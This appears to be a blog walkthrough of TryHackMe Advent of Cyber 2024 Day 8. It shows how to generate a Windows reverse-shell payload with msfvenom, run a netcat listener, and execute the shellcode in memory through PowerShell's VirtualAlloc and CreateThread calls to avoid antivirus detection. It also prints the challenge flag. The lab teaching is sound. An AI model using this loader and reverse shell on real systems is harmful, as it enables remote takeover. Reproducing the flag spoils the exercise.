THM AOC2024 DAY 8: Writing and Executing Shellcode

Every December, TryHackMe's Advent of Cyber delivers 24 free daily cybersecurity challenges, offering hands-on scenarios that simulate real-world attacks and defenses. Designed for beginners and professionals alike, it's an exciting, gamified way to explore topics like threat hunting, penetration testing, cryptography, and more. This event is perfect for building skills, gaining practical experience, and spreading some cybersecurity cheer during the festive season!

---

Learning Objectives

1. Grasp the fundamentals of writing shellcode.
2. Generate shellcode for reverse shells.
3. Execute shellcode with PowerShell.

---

Tools Overview

• Msfvenom: A versatile Metasploit utility used to generate payloads, such as reverse shells, in different formats for testing vulnerabilities.
• PowerShell: A scripting language and shell that can execute system-level commands, making it a common post-exploitation tool.
• Windows APIs (e.g., VirtualAlloc, CreateThread): These enable interactions with low-level system processes, essential for allocating memory and executing shellcode.

---

Task Walkthrough

Overview

Today's task dives into generating and executing shellcode to obtain a reverse shell. You'll also explore how PowerShell interacts with Windows APIs to execute shellcode, bypassing typical defenses.

---

Steps

Step 1: Generate Shellcode with msfvenom

1. Open the AttackBox terminal.
2. Run the following command, replacing ATTACKBOX_IP with your IP:bashCopy codemsfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell
   • Payload type: Reverse TCP shell for Windows x64.
   • Shellcode is output in PowerShell format.

Step 2: Prepare the PowerShell Script

1. Replace SHELLCODE_PLACEHOLDER in the provided PowerShell script with the generated shellcode byte array.
2. Save the script as a .ps1 file.

Step 3: Execute the Shellcode on the Target

1. Start a listener on the AttackBox:bashCopy codenc -nvlp 1111
2. On the VM, open PowerShell and paste the prepared script in segments. Execute each part step by step.

Step 4: Validate the Reverse Shell

1. Verify the connection on the AttackBox terminal.
2. Use basic commands like dir to confirm access.

---

Questions and Solutions

1. What is the flag value once Glitch gets reverse shell on the digital vault using port 4444?
   • Answer: AOC{GOT_MY_ACCESS_B@CK007}

---

Recap of Learning Objectives

Writing Shellcode: The Fundamentals

Shellcode is compact, low-level code written in assembly language and designed for direct execution by the processor. It's often used to exploit vulnerabilities, like buffer overflows, to gain control of a system. Key aspects include:

• Architecture-Specific: Match the CPU architecture (e.g., x86 or x64) of the target system.
• Avoid Null Bytes: These terminate strings in C, breaking exploits.
• Tools for Writing Shellcode:
  • Assemblers: NASM or MASM for creating shellcode.
  • Hex Editors: HxD for analyzing compiled code.
  • Disassemblers: Ghidra or IDA Pro for debugging.
• Focus on System Calls: Use functions like execve (Linux) or CreateThread (Windows) to interact with the operating system.

Shellcode must be position-independent and concise to operate seamlessly in exploit scenarios.

---

Generating Reverse Shells

A reverse shell connects a target system back to an attacker, providing remote control. Tools like msfvenom simplify this process:

• Command Example:bashCopy codemsfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell
  • LHOST & LPORT: Define where the shell connects back.
  • Format: Choose PowerShell for in-memory execution.

The generated shellcode is a hexadecimal byte array ready for deployment. This streamlines crafting payloads while focusing on how they interact with the target.

---

Executing Shellcode with PowerShell

PowerShell is a powerful tool for running shellcode in-memory, bypassing disk-based antivirus detection:

1. Process Overview:
   • Allocate memory with VirtualAlloc.
   • Copy the shellcode into memory.
   • Execute it with CreateThread.
2. Example Workflow:powershellCopy code[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length) $thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0) [WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
3. Why PowerShell?
   • Built-in on Windows.
   • Enables in-memory execution, avoiding file-based detection.

Understanding these techniques provides insight into both offensive and defensive strategies. Pairing shellcode fundamentals with PowerShell demonstrates a seamless blend of low-level programming and real-world exploitation techniques.